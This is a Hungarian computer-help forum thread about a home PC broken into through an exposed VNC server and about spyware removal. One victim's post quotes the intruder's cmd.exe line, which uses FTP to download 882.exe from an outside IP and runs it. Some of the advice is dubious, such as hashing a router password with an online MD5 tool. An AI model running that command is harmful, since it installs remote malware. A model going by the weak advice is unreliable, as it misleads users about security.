Új hozzászólás Aktív témák
-
Qwarc
csendes tag
mindig mindenben vannak biztonsági rések. a legujabb legstabilabb program is csak addig stbil amig egy ügyes kezű hacker (innentöl kezdve hálózati szakember és programozó) nem ir egy exploitot hozzá. az hogy egy vnc-t megtörnek.. háááát... kivülröl brute forceal egy kombinált jelszót nem egyszerű, főleg idöben problémás. mindenek elött ellenőrizném hogy a routerben nincs e nyitva a kliens ipre a DMZ esetleg más támadható portok (20, 21, 25, 80, 110, 3389, dc, torrent, játék portok) nem e fut valami server program a VNC kivül, nincs e a VNCnek alapértelmezett admin loginja ami elkerülhette a figyelmed, esteleg egy keylogger amiböl qrv4 gyorsan kinyerhető rengeteg adat. Antivirus programot én személy szerint a nod32-t ajánlom ami CSAK antivir. Spyware cuccot a spy sweepert, tüzfalnak az outpostot ami otthonra teljesen ingyenes. vizsgáld át az egész rendszert feladatkezelőből is amit nem tudsz hogy mi keress rá a google-n, ha gyanus keresd meg és lödd ki. ajánlott egy futtatás/msconfig azon belül automatikus inditás átnézés is, ott is lehet találni okosságokat. ha nagyon stabil védelmet akarsz akkor a router tüzfalat kapcsold be és az admin jelszót kódóld el pl md5el majd azt használd. Neten sok online md5 kódoló van.
-
[w]
őstag
ultravnc-ben van olyan beállítási lehetőség, hogy automatikusan elfogadja a bejövő kapcsolatot, ha a jelszó helyes vagy csak úgy engedje, ha a helyi user rányom egy ''accept'' gombra. ez nem tudom megvan-e a realvnc-ben is, de mint funkció nem rossz, hatásos védelmi pont lehet.
-
snowflake
tag
Persze mert az fizetős.... használd ssh tunnel-el.
pl: [link]
vagy:
[link]
Adawre-t gyorsban leuftattam és nem talált semmit.
Ha az is olyan megbizható mint a használt vnc, akkor nem is fog
Abban biztos lehetsz, hogy nem csetelésre akarta/akarja használni a géped az illető... szóval ha már ott járt, biztos elrakott néhány kakukktojást is oda...
[Szerkesztve] -
#61
Realradical
őstag
Realradical
őstag
Ja látom többen megelőztek!
-
[w]
őstag
a tűzfal azért kell, mert ha a router be is engedi a megadott porton a forgalmat, a tűzfal megfogja, ha nincs hozzárendelve engedélyezett port és alkalmazás. az a minimum, hogy az ip ''trusted'' legyen, amit csak valamilyen tűzfallal tudsz beállítani.
a trójai is magyarázat lehetne az esetre, de mégsem az, hiszen láttad a monitorodon, hogy valaki más mozgatja a kurzorodat. -
snowflake
tag
A VNC önmagában nem titkosított adatkapcsolatot hoz létre, szóval az adatok simán natúr közlekednek rajta.. a jelszót pedig brute forceal is meglehet tudni.
De simán van a vnc-nek is biztonsági hibája, talán épp tavaly nyáron harangozták be az egyik ilyen ''jelszó nélkül is be tudok lépni'' hibáját...
Persze a fizetős enterprise-al lehet, hogy más a helyzet...
Mindig másik ip-t adott meg, ez a parancssor mit hajt végre?
Egy i fileba írta a különféle ftp-k elérését, majd onnan letöltött egy 882.exe-t, majd azt futtatta és törölte az i állományt....
Szóval érdemes lenne egy netstat-tal megnézni mizujs a netkapcsolatok terén... persze, ha lecserélte azt is akkor az sem fog semmi extrát mutatni....
húzd újra a rendszert...![;]](//cdn.rios.hu/dl/s/v1.gif)
-
Batman
őstag
Igen az ember a saját hibájából tanul a legjobban.
A vnc kérte a jleszot mert kipróbáltam és kéri.
Hát igen ezek után én is jobban oda fogok figyelni a gépem biztonságára, már nézegetem is melyik ingyenes tűzfalakat ajálják az emberek.
Amugy ha felrakok egy tűzfalat az meg mindig nem oldja meg mert a zon is engedve lenne a vnc-és ha két mozdulattal megtörik a vnc jelszavat akkor azzal a tűzfal sem tud mizt kezdeni mert olyan mintha siman valaki beloggolt volna legálisan. -
[w]
őstag
ha a routerben beállítottad, hogy melyik portot melyik gépre forwardolja a helyi hálózatban, akkor naná, hogy beengedi, annak a ''tűzfala'' ebben az esetben semmit nem ér.
milyen vnc-t használsz? én anno hasonlóképp szívtam az ultravnc egy korai változatával. az történt, hogy hiába állítottam be jelszót és nyomtam lelkesen az ''apply''-t, mégsem kérte a jelszót. aztán kiderült, hogy újra kellett volna indítani a vnc-t, hogy életbe lépjen ez a beállítás.
javaslom egy szoftveres tűzfal használatát IS, szerintem elengedhetetlen. -
Batman
őstag
Hát sajnos nagyon ugy fest ,hogy valaki nekem is betört a gépemre.
Egy linksys wrt54g v5-ös ruterem van, amire hétvégen raktam fel dd-wrt firmwaret.
Vnc-t eddig csak lokális hálózaton használtam, de most kellet hogy kívülről is elérhessem.
Tegnap beállítottam, erre este mikor leülök a gép elé mit látok valaki nagybna dolgozik rajta távolról a vnc ikon aktív és csinálja adolgát.
A routeren engedélyeztem a portot ami kell neki, és a vnc-ben egy 8 hosszú kis és nagy betüt és számot is tartalmazó kodot használtam, nincs ben tszótarban a szó ,úgy gondoltam ez elég lesz.De tévedtem.
Nézegetem a routerben a bejövő logokat hátha találok egy ip-t vagy valami de full üres.
A jelszót rajtam kívül senki sem ismerte.
Amugy az emberünk folyamatosan ezt írkálta a run-ba:
cmd.exe /c del iecho open 86.101.48.236 4807 > iecho user 1 1 >> i echo get 882.exe >> i echo quit >> i ftp -n -s:i 882.exedel iexit
Mindig másik ip-t adott meg, ez a parancssor mit hajt végre?
Most a routeren is lezártama portokat és a vnc servert is kilőttem.
Jah azt elfelejtettem írni ez egy win xp prof avg vírusírtóval, ő semmit nem vett észre de nem is ez a dolga.
üdv -
netkoo
senior tag
Szia
SP 1 m van!
Router beiktatására gondoltam mert az plusz védelem?
Most felraktam a Kaspersky Anti Hackert és azota minden rendben van
Telepitése ota 12kisérlet volt amit sikeresen megakadályozott
De érdekes modon a legtöbb behatolás a szolgáltatom által használt gépekel történt!!!
Enyit a biztonságukrol
Felhivtam őket aszonták ááááááááááá biztos nem az ő hálozatukrol van!
Na mindegy most minden ok ugy nézki -
Noxy
veterán
Bocsi, a linkek osszecsusztak.
Viruskergeto: Bővebben: link
Tuzfal: Bővebben: link
[Szerkesztve] -
Noxy
veterán
Milyen XP-d van ? SP1 ? SP2 ?
Telepiteskor torold azt a particiot amin az XP van. Hozd letre ujra es teljes format. (lassu)
A modem, vagy a router kabelt kihuzod.
Ha tudsz, akkor SP2-el integrált telepito CD-rol telepits.
Virus kergetot Bővebben: link Ad-Aware SE ,
Spy Sweepert felpakolod. Bővebben: link
Kabelt visszadugod, mindent frissitesz. Az xp-t is .
Ha kesz, akkor átnezed a tobbi meghajtot is.
[Szerkesztve] -
netkoo
senior tag
Sziasztok
Megint használja valakia gépem
este a hálozati helyeknél a megosztot dokumentumok voltak!!!
Rá katintotam a megosztot képekre ........Kiirta aZ Explorer hibát észlelt ezért leáll!!!
Majd vilant egyet a képernyő és minden ikon eltünt az asztalrol!!!!
Majd kb 1perc mulva megjelentek de a virus védöm és awinsonár nme!!!
Valakinek valamilyen ötlete????? -
corlagon
senior tag
Ha már a csökkentett mód sem indul el (vagy nem akarsz tökölni vele):
- gyártasz egy live windows cd-t BartPE-vel (Bővebben: link, 20 perc alatt megvan), beépíted az adaware-t, spybot-ot, meg pár vírusirtót
- bootolsz cd-ről, irtasz mint állat -
#28
L3zl13
nagyúr
Ürgülfütty
#9
L3zl13
nagyúr
válasz
Ürgülfütty
#9
üzenetére
Hú bazze ebbe én is belefutottam! Mennyit szoptam vele emlékszem.
Amivel végül sikerült asszem Avast futtatása bootoláskor friss adatbázissal, és a lényeg, hogy kapcsold ki a weblap megjelenítését az asztalon! (Jobb klik az asztalon, Tulajdonságok/ Asztal fül/ Asztali elemek testreszabása/WEB fül és ott ez a kis mocsok.
[Szerkesztve] -
Elrond
senior tag
Sziasztok!
Tegnap nálunk is járt ez gonosz kis vírus,sajnos hasonló eredeménnyel!
Nekem sem idult el csökkentett módban egyik symantec-csoda sem!
Próbáltam meggyógyítani az XP-t
a cd-ről,de a frissítés után eljutott a bejelentkezésig,
és ott üres képernyő fogadott
Szerintem ez teljes reinstall lesz!
[Szerkesztve] -
#14
kBagyula
senior tag
Ürgülfütty
#9
kBagyula
senior tag
válasz
Ürgülfütty
#9
üzenetére
Szia!
Beszedted a CoolWebSearch-et. Ezt csak a CWShredder-el tudod legyakni. 1-2 napja egy ismerős gépén ilyennel szívtam én is egy fél délutánt.
Innen letöltheted a progit: Bővebben: link
Használata pofon egyszerű.
Üdv,
kBagyula
szerk: elírtam a prog. nevét
[Szerkesztve] -
netkoo
senior tag
Szia!
A fsecure elindult talált egy trojanJava class Loadert amit leszedtem.
A winsonar talált egy SSMaui wowee exe. progit amit megtaláltam leszedtem most nem ir ki semit a sonar lehet hogy sikerült??
Tüzfalam van a szolgáltato általi
iu ez egy játék volt amit a az aszony szedet le a yaaho gamesröl
most sokal gyorsabba gépem is
köszi a segitséget mindenkinek -
#10
behappy
aktív tag
Ürgülfütty
#9
behappy
aktív tag
válasz
Ürgülfütty
#9
üzenetére
csökkentett modban le fogod tudni törölni. javaslom a manuális irtást.
-
#9
Ürgülfütty
tag
Ürgülfütty
tag
Hi;
Én is segítséget kérnék...a család egyik számítógépe benyelt valamiféle spyware-t. Az effekt a következő: a desktopra ( rá a háttérképre ) bootolás után az a rohadék elővarázsol egy fekete képernyőt, rajta valami anti-spyware reklámmal illetve egy linkkel. Egyszerűen nem tudom eltüntetni. Végigmentem rajta spysweeperrel, Spybottal, vírus irtóval, de semmi...a vírusirtó talál egy trojant, amit viszont nem tud letörölni. Kitakarítottam a registry-t. Semmi.
Ötlet?
-
#8
Cardinella
aktív tag
netkoo
#7
-
Diskcopy
tag
Csökkentett mód Ad-Aware Se, SpyBot S&D, Spy Sweeper, Hijack this-el nézd végig. Persze előtte sima indításból update-eld ezeket. Aztán a tálcát helyre tudod hozni ezzel: Bővebben: link. Tálcára megnézheted még ezt is. Bővebben: link, de csak azután érdemes miután leirtottál mindent. Én átmennék egy Nod32-vel is rajta biztos ami biztos.
[Szerkesztve] -
netkoo
senior tag
Sziasztok!
Tudna valaki segiteni?????
Valoszinü valéaki használja a gépem???
Időnként eltünik a tálca majd megjelenik!!
Este mikor fel akkartam menia netre Expoleler
aako kiirta hogy nem tok mert már használja valaki!!!!!
Kiirja lépjek ki és akor felenged!
De nem tok semit csinálni a virus keresöm se indul el F secur 2005.
Tud valaki segiteni???
pls elöre is
Winsonar lefutatva üzenetWpid-B1internal code ez mi??,
[Szerkesztve]
![;]](http://cdn.rios.hu/dl/s/v1.gif)
senki???????????????
Kilőttem a kis szemetet, hogy rohadna meg, aki kitalálta.
Új hozzászólás Aktív témák
- Külföldi prepaid SIM-ek itthon
- Apple MacBook
- Háztartási gépek
- PlayStation 5
- Így ismerd fel AI nélkül az AI képeket!
- Kerékpárosok, bringások ide!
- Linux kezdőknek
- Folyószámla, bankszámla, bankváltás, külföldi kártyahasználat
- Fejhallgató erősítő és DAC topik
- Luck Dragon: Asszociációs játék. :)
- További aktív témák...
- BESZÁMÍTÁS! Sony PlayStation 5 825GB SSD lemezes konzol fejhallgatóval garanciával hibátlan működés
- LENOVO ThinkBook 14s Yoga touch 360 - i5-1135G7, 16GB RAM, SSD, jó akku, számla, 6 hó gar
- Bomba ár! Dynabook Portege X30-L-K - i7-1260P I 8GB I 256SSD I 13,3" FHD I Cam I W11 I Gari!
- Surface 3 - 13,5" 2k érintő, i5 1035G7, Iris Plus, 16GB RAM, SSD, jó akku, újszerű állapot, számla
- GYÖNYÖRŰ iPhone 13 Pro 256GB Sierra Blue -1 ÉV GARANCIA - Kártyafüggetlen, MS4414
Állásajánlatok
Cég: Laptopműhely Bt.
Város: Budapest